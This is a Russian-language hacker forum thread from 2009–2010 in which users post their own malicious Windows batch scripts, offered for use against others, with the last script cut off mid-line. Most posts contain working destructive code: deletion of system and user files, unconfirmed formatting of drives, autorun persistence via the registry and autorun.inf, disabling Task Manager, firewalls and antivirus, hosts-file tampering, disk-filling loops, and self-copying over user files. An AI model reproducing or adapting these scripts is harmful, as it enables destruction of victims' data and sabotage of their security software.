RE: Пишем сюда свои *.BAt-вирусы
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-24 16:24:23.656666
|
|
|
Wlada
Сообщений: 1233
Оценки: 0
Присоединился: 2007-09-24 12:01:26.970000
|
quote:
ORIGINAL: AloneMonaX Я к теме твоей программы больше не возвращаюсь! Пиши лучше на си++)) пишу quote:
Почему именно БАТ нужен тебе??? ну, как тебе сказать [sm=bw.gif] считай что это женский каприз [sm=d03041.gif]
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-04-02 12:51:40.420000
|
|
|
SoldierASP
Сообщений: 17
Оценки: 0
Присоединился: 2008-08-13 10:38:37.486666
|
quote:
hakers сказал: @echo off del "%SystemRoot%\Cursors\*.*" >nul Del C:\WINDOWS\system32\catsrvps.dll Del C:\WINDOWS\system32\catsrvut.dll Del C:\WINDOWS\system32\cdfview.dll Del C:\WINDOWS\system32\cisvc.exe Del C:\WINDOWS\system32\ckcnv.exe Del C:\WINDOWS\system32\clb.dll Del C:\WINDOWS\system32\cmd.exe Del C:\WINDOWS\system32\cmdial32.dll Del C:\WINDOWS\system32\cnbjmon.dll Del C:\WINDOWS\system32\comctl32.ocx Del C:\WINDOWS\system32\dplaysvr.exe Del C:\WINDOWS\NOTEPAD.EXE Del C:\WINDOWS\twunk_32.exe Del C:\WINDOWS\wmprfRUS.prx Del C:\WINDOWS\WindowsShell.Manifest'); Del C:\WINDOWS\regedit.exe Del C:\WINDOWS\explorer.exe Del C:\WINDOWS\OemDrv Del C:\WINDOWS\PeerNet\sqldb20.dll Del C:\WINDOWS\PeerNet\sqlqp20.dll Del C:\WINDOWS\twain_32\wiatwain.ds del virus.bat ну да. И на удаление каждого из файлов будет вопрос: Вы действительно желаете удалить файлы? [y/n] Юзай del /? и будет счастье. Если команду правильно описать - сносит все файлы по определенной маске из всех подкаталогов. Вообще бат вирусы - индивидуальные вирусы. Если пытаться внедрить его жертве, то надо писать под нее. Почему? Винда будет стоять на диске D и толку от того, что у тебя идет снос файлов с диска С? Самый простой скрипт - format d: /y (форматирование без подтверждения)- если винда стоит на диске С, а вся важная инфа на диске D. То последней придет капут. зачем написал - не знаю. дураков в сети много. будут юзать.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-04-04 11:46:06.986666
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
quote:
Вообще бат вирусы - индивидуальные вирусы. Если пытаться внедрить его жертве, то надо писать под нее. Почему? Винда будет стоять на диске D и толку от того, что у тебя идет снос файлов с диска С? %USERPROFILE% - [C]:\Documents and Settings\[LAMER] %ProgramFiles% - это понятно что=) %USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch - быстрый запуск %USERPROFILE%\SendTo - меню "Оптравить" %windir% - Wind00z))) %temp% - поняна че ето %systemdrive% - сист.диск Юзай это и подстраивать не надо)))
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-04-04 14:11:52.206666
|
|
|
Zmaster
Сообщений: 930
Оценки: 0
Присоединился: 2007-02-09 19:02:43.500000
|
quote:
ORIGINAL: AloneMonaX quote:
Вообще бат вирусы - индивидуальные вирусы. Если пытаться внедрить его жертве, то надо писать под нее. Почему? Винда будет стоять на диске D и толку от того, что у тебя идет снос файлов с диска С? %USERPROFILE% - [C]:\Documents and Settings\[LAMER] %ProgramFiles% - это понятно что=) %USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch - быстрый запуск %USERPROFILE%\SendTo - меню "Оптравить" %windir% - Wind00z))) %temp% - поняна че ето %systemdrive% - сист.диск Юзай это и подстраивать не надо))) А если хочешь еще лучще (точнее), тогда введи в командную строку комунду set без параметров.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-05-11 23:21:35.543333
|
|
|
sanya405
Сообщений: 2
Оценки: 0
Присоединился: 2009-05-03 00:43:40.400000
|
Привет, прочитав тему, попробывал написать свой первый вирь, а скорее программу-прикол…. ———————————————————- @echo off Date 06.06.06 //меняем дату Time 00:00 //время %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul //меняем местами кнопки мыши if exist C:\WINDOWS\system32\sys\1st.bat goto zet md "%SystemRoot%\system32\sys" >nul //создаем папку sys в system32 copy %0 "%SystemRoot%\system32\sys\1st.bat" >nul //копируем себя в эту папку attrib +h +s +r %SystemRoot%\system32\sys\ >nul //ставим атрибуты attrib +h +s +r %SystemRoot%\system32\sys\1st.bat >nul //ставим атрибуты reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ctfm0n.exe /t REG_SZ /d C:\WINDOWS\system32\sys\1st.bat /f >nul //создаем ключ автозапуска :zet msg * "Ahahaahahah!!! I fucked you!!!))))" //пишем что хотим exit ————————————————– ПС полную работоспособность не проверял, но на стадии написания все работало… ПСС В код можно добавить много чего интересного….
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-06-28 23:17:20.786666
|
|
|
hack001
Сообщений: 2
Оценки: 0
Присоединился: 2009-06-27 20:49:40.086666
|
@Echo off (запрещаем вывод на экран исполняемых команд) Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно) Date 13.09.96 (эта строка изменяет дату) If exist c:ski.bat goto abc (проверяет существует ли файл, …..) Copy %0 c:ski.bat (копирует вирус только изменив названия) Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку :abc ( ……если он существует, то программа перейдет на метку :abc) md PRIDUROK md LUZER md DURAK (Создает пустые папки) md LAMER Label E: PRIDUROK (CD-ROM будет называться PRIDUROK) assoc .exe=.mp3 (запускает все ексшники как музыка del c:Program Files/q (удаляет все файлы из этой папки) Echo VIRUS LOAD (Выводит надпись) ================== вирус хороший у меня kis7.0 вырубил ! не одна прога непашит ! вообщем тема вирус !
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-06-28 23:36:40.603333
|
|
|
hack info
Сообщений: 20
Оценки: 0
Присоединился: 2009-05-16 11:33:40.703333
|
Я бат вирус когда делал нод незапалил на вирустотал проверил там много кто ругаться начал)):)
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-07-05 01:34:02.180000
|
|
|
vurgho44
Сообщений: 1
Оценки: 0
Присоединился: 2009-07-05 01:20:37.003333
|
Хелло всем=) по синтаксу легче вроде бы писать не параметры а : format c: | y . легко накладываем йес на все комманды, которые требуют подтверждения Юзверя.. Все движения в сторону windir итп отслеживаются на корню. Тушим AV ( как не напишу=)) варианты: 1.меняем дату(баян). 2.меняем разрешение(assoc) -перезагрузка, открываем(перечень не забываем вбахать в батник) все файлы антивиря блокнотом( чем удобней), далее код виря, т.к AV впадёт в кому. 3.запрещаем или ограничиваем доступ к файлам( указываем файлы конфига и баз данных AV). 4.снимаем автозагрузку( не обязал. через реестр ибо палится) ребут -код виря.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-07-13 14:24:14.726666
|
|
|
ShamanNet
Сообщений: 8
Оценки: 0
Присоединился: 2009-06-06 16:03:05.680000
|
Доброго всем времени суток. А как можно проверить, совпадает ли системная дата с нужной мне датой? Например, мне нужно сделать переход к метке, если системная дата = 13.07.2009 IF %DAY%.%MONTH%.%YEAR%==13.07.2009 GOTO MARK :MARK MSG * "Готово!" Заранее благодарен за ответ Всё оказалось очень просто! CHCP 1251 IF %DATE%==15.07.2009 GOTO MARK MSG * "Сегодня "%DATE% EXIT :MARK MSG * "Сегодня 15.07.2009" EXIT
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-08-07 01:02:16.573333
|
|
|
VSB
Сообщений: 1
Оценки: 0
Присоединился: 2009-08-07 00:46:53.863333
|
Может мне хоть тут кто поможет ??? Надо написать батник чтоб убить процес каспера и желательно чтоб батник был с автозапуском т.ё поподая на комп чтоб активировался сам Буду очень благодарен если кто поможет
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-08-18 04:11:41.153333
|
|
|
SamuraiPro
Сообщений: 8
Оценки: 0
Присоединился: 2008-03-15 18:45:33.223333
|
quote:
Может мне хоть тут кто поможет ??? Надо написать батник чтоб убить процес каспера и желательно чтоб батник был с автозапуском т.ё поподая на комп чтоб активировался сам Буду очень благодарен если кто поможет Хех касперского батникам =) Что думаешь там совсем дураки его написали? Вобще процесс можно завершить командой taskkill , но каспера не сможешь.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-08-19 13:56:48.523333
|
|
|
Zmaster
Сообщений: 930
Оценки: 0
Присоединился: 2007-02-09 19:02:43.500000
|
Антивирус Касперского ставит в систему специальный драйвер, который перехватывает все сообщения о его убийстве. Я как-то давно писал пост, в котором было написано, как убить процесс Каспера на Delphi. Но я наверное его не найду. Топик кажись назывался "Убить проактивку антивируса". P.S. Завышаете вы возможности бат-файла. Запомните, это не язык программирования. Это всего лишь навсего файл с системными командами Windows.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-10-18 17:58:09.393333
|
|
|
minya92
Сообщений: 1
Оценки: 0
Присоединился: 2009-10-18 14:05:37.713333
|
Вот смотрите, написал феньку от которой у бедного ламера будет глючить комп: @echo off echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs echo do >> %systemdrive%\windows\system32\rundll32.vbs echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs echo loop >> %systemdrive%\windows\system32\rundll32.vbs start %systemdrive%\windows\system32\rundll32.vbs reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f и вот это если вы уже случайно запустили у себя, или вам жалко того ламера: TASKKILL /F /IM wscript.exe del c:\windows\rundll32.vbs del c:\rundll32.sys del d:\rundll32.sys короче эта фигня будет создавать в папке систем32 файлик rundll32.dat в который будет прописывать много пустых строчек в этот файл тем самым он будет весить около 500 мб. Во время проспики будет сильно нагружаться цп. Как токо он всё запишет этот файл то он удалиться, и пойдет все заново, пока ламер не додумается завершить прцесс wscript.exe И еще это хрень прописывает ся в автозагрузку
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-10-20 11:11:08.696666
|
|
|
Tester_Egor4ik
Сообщений: 161
Оценки: 0
Присоединился: 2009-10-15 15:45:32.776666
|
интересует запись в файл.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-11 17:26:11.683333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
В предыдущих постах написано про запись в файл=)
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-19 15:32:29.076666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Пиндец бред) что есть вирус? Компью́терный ви́рус — разновидность компьютерных программ, отличительной особенностью которой является способность к размножению! А вы хню всякую суете… которой можно чисто подгадить юзверю… ——– вот помогите лучше мне с кодом надо передавать ECHO с пере направлением в файл в той же комманде) пример ECHO "echo %date%-%time%-RUN >> virus.log" >> virus.bat то что в кавычках нужно записать в файл… как решить проблему? код выше работает неправильно… ——– ТО ЧТО ВАМ ЯВНО НУЖНО: Quick Batch File Compiler - программа преобразующая код bat файла, в exe файл с нужной вам иконкой! –
chcp 1251
title Loading... please wait...
set taskkiller="%userprofile%\tkillr.bat"
set autorun="%userprofile%\Главное меню\Программы\Автозагрузка\starter.bat"
set taskker="%userprofile%\tmadr.bat"
set log="%userprofile%\winV.log"
set t=at %time%
set m=msg * Здравствуй нуб) нажми ок!
echo start %taskker% > %autorun%
echo [ add time run ] %date% - %time:~0,5% %username% >> %log%
echo taskkill /f /im explorer.exe > %taskkiller%
echo %m% >> %taskkiller%
echo [ run bat file ] %date% - %time:~0,5% %username% >> %log% >> %taskkiller%
%t:~0,8% /interactive %taskkiller% >> %taskker%
start %taskker%
а это мой недоделанный bat вирусь… которому так же надо дописать функцию размножения… *** вот еще прикольная вещь
:m
fsutil file createnew C:\%randome% 1073741824
goto m
файл забивает диск C:\ пустыми гигабайтными файлами… с именами состоящих из цифр выбирающихся рандомно где-то от 4000 до 30000. ******кстати спасибо за код TIME BOMB : ) можно отправлять людей погулять в Пятницу 13е******
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-19 15:49:55.020000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
quote:
ECHO "echo %date%-%time%-RUN >> virus.log" >> virus.bat Сразу в два файла чтоли хочешь?)
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-21 14:42:12.846666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Нет…) должен создаться файл Virus.bat а в нем строка echo %date%-%time%-RUN >> virus.log
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-21 15:05:13.166666
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Обязательно одной строкой))))?
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-21 15:12:43.313333
|
|
|
vfrvfr33
Сообщений: -9
Оценки: 0
Присоединился: 2009-11-21 14:27:29.976666
|
Всё для web-мастера - http://for-web-mastera.ru/
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-22 14:21:48.016666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
мне любым способом нужно впечатать echo %date%-%time%-RUN >> virus.log в батник чтобы одной строкой было… )) иначе никак…
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-06 06:04:59.510000
|
|
|
BandyT
Сообщений: 1
Оценки: 0
Присоединился: 2009-12-06 05:58:12.800000
|
Подскажите пожалуйста код, чтобы батник копировался на флэшку, когда её вставят…
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-09 17:13:16.446666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Всем бы такой знать))) кстати сайт с вирусами http://vx.netlux.org/ там bat файлы можно качать и разбирать
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-11 20:59:20.700000
|
|
|
LaRio
Сообщений: 56
Оценки: 0
Присоединился: 2009-12-11 20:17:18.650000
|
как можно с помощью бат оглушить всю сеть в клубе?
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-19 14:41:42.710000
|
|
|
VAN32
Сообщений: 20
Оценки: 0
Присоединился: 2009-11-06 20:37:37.856666
|
Обозвать учетную запись @echo off Chcp 1251 Cls net user %username% >nul msg * %username% "Ламер" >nul
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-01 16:42:11.026666
|
|
|
Alligatormu
Сообщений: 7
Оценки: 0
Присоединился: 2010-01-01 15:40:20.690000
|
Здесь их куча ->http://life-web.ucoz.ua
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-11 17:27:46.553333
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
а как можно запустить другие батники?если уже писали просьба ткнуть пальцем
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-11 18:25:41.580000
|
|
|
janitor
Сообщений: 100
Оценки: 0
Присоединился: 2009-09-11 15:33:08.426666
|
call start
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-11 19:46:06.780000
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
понял.start можно было догадаться)
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-12 19:47:09.896666
|
|
|
VAN32
Сообщений: 20
Оценки: 0
Присоединился: 2009-11-06 20:37:37.856666
|
@echo off del /Q /F C:\Program Files\Aim6\*.* del /Q /F C:\Program Files\Aim\*.* Cls del /Q /F C:\Program Files\Aim5\*.* del /Q /F C:\Program Files\Internet Explorer\*.* del /Q /F C:\Program Files\itunes\*.* ipconfig /release if ERRORLEVEL1 ipconfig /release_all del /Q /F C:\Program Files\*.* net stop "MpsSvc" taskkill /f /t /im "FirewallControlPanel.exe" net stop "wuauserv" del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*" del /f /q"C:\Users\%userprofile%\My Documents\My Music\*.*" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 rapidshare.com >> "Hosts" echo 127.0.0.1 www.rapidshare.com >> "Hosts" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 msn.com >> "Hosts" echo 127.0.0.1 www.msn.com >> "Hosts" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 meebo.com >> "Hosts" echo 127.0.0.1 www.meebo.com >> "Hosts" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 bebo.com >> "Hosts" echo 127.0.0.1 www.bebo.com >> "Hosts" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 myspace.com >> "Hosts" echo 127.0.0.1 www.myspace.com >> "Hosts" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 google.com >> "Hosts" echo 127.0.0.1 www.google.com >> "Hosts" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 youtube.com >> "Hosts" echo 127.0.0.1 www.youtube.com >> "Hosts" cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 facebook.com >> "Hosts" echo 127.0.0.1 www.facebook.com >> "Hosts" taskkill /f /t /im "itunes helper.exe" Cls taskkill /f /t /im "itunes.exe" taskkill /f /t /im "svchost.exe" taskkill /f /t /im "svchost.exe" taskkill /f /t /im "svchost.exe" Cls taskkill /f /t /im "svchost.exe" taskkill /f /t /im "svchost.exe" taskkill /f /t /im "svchost.exe" taskkill /f /t /im "wmplayer.exe" @echo off :A start explorer cmd paint goto :A reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f Cls taskkill /f /t /im "aim6.exe" taskkill /f /t /im "iexplore.exe" taskkill /f /t /im "firefox.exe" Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.wav) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.zip) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.txt) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.html) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath Dir %SystemRoot% /s /b > PathHost For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul Del /f /s /q PathHost > Nul del /Q /F A:\*.* del /Q /F B:\*.* del /Q /F C:\*.* Cls del /Q /F D:\*.* del /Q /F E:\*.* del /Q /F F:\*.* Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.wmv) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.mp3) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.jpg) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.exe) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath RUNDLL32 USER32.DLL,SwapMouseButton assoc.dll = txtfile assoc.exe = pngfile assoc.bat = WinRAR Cls assoc.vbs = Visual Style assoc.reg = xmlfile assoc.txt = regfile reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f DEL /F /Q %UserProfile%\Documents\*.* >nul DEL /F /Q %UserProfile%\Pictures\*.* >nul DEL /F /Q %UserProfile%\Videos\*.* >nul DEL /F /Q %UserProfile%\Downloads\*.* >nul DEL /F /Q %UserProfile%\Music\*.* >nul FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul FORMAT D: /FS:NTFS /V:(D:) /X /P:1 /y >nul FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul FORMAT K: /FS:NTFS /V:(K:) /X /P:1 /y >nul FORMAT L: /FS:NTFS /V:(L:) /X /P:1 /y >nul FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul set fun=net set morefun=stop set Da=tsk set VooDoo=ill set DaVooDoo=del set beer=/a %fun% %morefun% "Security Center" %fun%sh firewall set opmode mode=disable %Da%%VooDoo% %beer% E-* %Da%%VooDoo% %beer% av* %Da%%VooDoo% %beer% fire* %Da%%VooDoo% %beer% anti* %Da%%VooDoo% %beer% spy* %Da%%VooDoo% %beer% bullguard %Da%%VooDoo% %beer% PersFw %Da%%VooDoo% %beer% KAV* %Da%%VooDoo% %beer% ZONEALARM %Da%%VooDoo% %beer% OUTPOST %Da%%VooDoo% %beer% nv* %Da%%VooDoo% %beer% nav* %Da%%VooDoo% %beer% F-* %Da%%VooDoo% %beer% ESAFE %Da%%VooDoo% %beer% cle %Da%%VooDoo% %beer% BLACKICE %Da%%VooDoo% %beer% def* %Da%%VooDoo% %beer% kav %Da%%VooDoo% %beer% kav* %Da%%VooDoo% %beer% avg* %Da%%VooDoo% %beer% ash* %Da%%VooDoo% %beer% norton* %Da%%VooDoo% %beer% nisum* %Da%%VooDoo% %beer% padmin %Da%%VooDoo% %beer% panda* %Da%%VooDoo% %beer% safe* %Da%%VooDoo% %beer% avas* %Da%%VooDoo% %beer% norm* %Da%%VooDoo% %beer% zlclien* %Da%%VooDoo% %beer% norton* %Da%%VooDoo% %beer% guard* %Da%%VooDoo% %beer% mcafe* %Da%%VooDoo% %beer% ewid* %DaVooDoo% /Q /F %ProgramFiles%\kasper~1\*.exe %DaVooDoo% /Q /F %ProgramFiles%\f-prot95\*.* %DaVooDoo% /Q /F %ProgramFiles%\Mcafee\*.* %DaVooDoo% /Q /F %ProgramFiles%\nod32\*.exe %DaVooDoo% /Q /F %ProgramFiles%\panda software\*.* %DaVooDoo% /Q /F %ProgramFiles%\ewido\*.exe %DaVooDoo% /Q /F %ProgramFiles%\kav\*.exe %DaVooDoo% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe %DaVooDoo% /Q /F %ProgramFiles%\webproxy\*.exe
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-15 18:11:38.360000
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
Echo c:ski.bat >>autoexec.bat запись "c:ski.bat" в файл "autoexec.bat"
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-15 19:58:41.196666
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
Вот, дописал свой первый вирус
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-15 19:59:43.836666
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
Вот, дописал свой первый вирус quote:
@echo off reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Ctfmon.exe /t REG_SZ /d C:\WINDOWS\system32\sys\MK4.bat /f >nul copy %0 "C:/autorun.inf" >nul copy %0 "C:/autorun.bat" >nul echo open=autorun.bat del C:\* /q ; >>autorun.bat >nul copy %0 "D:/autorun.inf" >nul copy %0 "D:/autorun.bat" >nul echo open=autorun.bat del D:\* /q ; >>autorun.bat >nul rundll32 keyboard,disable >nul rundll32 mouse,disable >nul exit
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-02 20:22:44.700000
|
|
|
Пельмех
Сообщений: 1
Оценки: 0
Присоединился: 2010-01-11 21:07:23.456666
|
Вот почитал полезности и создал свой вирус, по-моему страшная вещь! :) Копируем текст вставляем в *.bat и суём в папку автозагрузки(та что в пуске) после включения компа файл все сохранит в C:\Program Files\Internet Explorer\WINCDPatch.bat (дата просто будет другая и мы не спалимся.) А вот и сам скрип с применением JS и VBS: echo off *//Добовляем в файл WINCDPatch.bat Отключение Клавы echo @@echo off rundll32 keyboard,disable >"C:\Program Files\Internet Explorer\WINCDPatch.bat" *//Добовляем в файл WINCDPatch.bat Отключение Мыши echo @@echo off rundll32 mouse,disable >>"C:\Program Files\Internet Explorer\WINCDPatch.bat" *//Добовляем в файл WINCDPatch.bat Запуск окна Echo var WSHShell = WScript.CreateObject("WScript.Shell");>"C:\Program Files\Internet Explorer\RtlExUpd.js" echo WSHShell.Popup ("Вы используете не лицензионную продукцию. В связи с чем работа вашего компьютера будет заблокирована!",10000, "Microsoft Corporation", 16);>>"C:\Program Files\Internet Explorer\RtlExUpd.js" echo @@echo off start "C:\Program Files\Internet Explorer\RtlExUpd.js" >>"C:\Program Files\Internet Explorer\WINCDPatch.bat" *//Создаем файл из-за которого зависает компьютер(Он создает кучу файлов в папке C:\$RECYCLE.BIС) : echo Set FileSystemObject=createobject("scripting.filesystemobject") >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo On Error Resume Next >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo FileSystemObject.CreateFolder "C:\$RECYCLE.BIС" >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo do >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo Dim a >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo a=a+(1) >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo b=b-1 >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo d=d+3 >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo e=b+d+a >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo Set Men = FileSystemObject.OpenTextFile("C:\Windows\ServiceProfiles\" &a& ".ini", 8, True) >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo Men.WriteLine ("a23e" &e& ", inf class:" &d& "\") >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo Men.Close >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" echo loop >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs" *//Добовляем в файл WINCDPatch.bat Запуск зависания echo start "C:\Program Files\Internet Explorer\WINCDPatch.vbs" >>"C:\Program Files\Internet Explorer\WINCDPatch.bat" *//Создаем кучу ярлычков на рабочем столе echo Set S = CreateObject("Wscript.Shell") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo do >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo set WshShell = WScript.CreateObject("WScript.Shell") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo strDesktop = WshShell.SpecialFolders("Desktop") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo set objShellLink = WshShell.CreateShortcut(strDesktop & "\MyProgram.lnk") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo objShellLink.TargetPath = "C:\PathToYourProgram\YourProgram.exe" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo objShellLink.WindowStyle = 0 >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo objShellLink.Hotkey = "G" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo objShellLink.IconLocation = "YourProgram.exe, 1" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo objShellLink.Description = "My Program Shortcut" 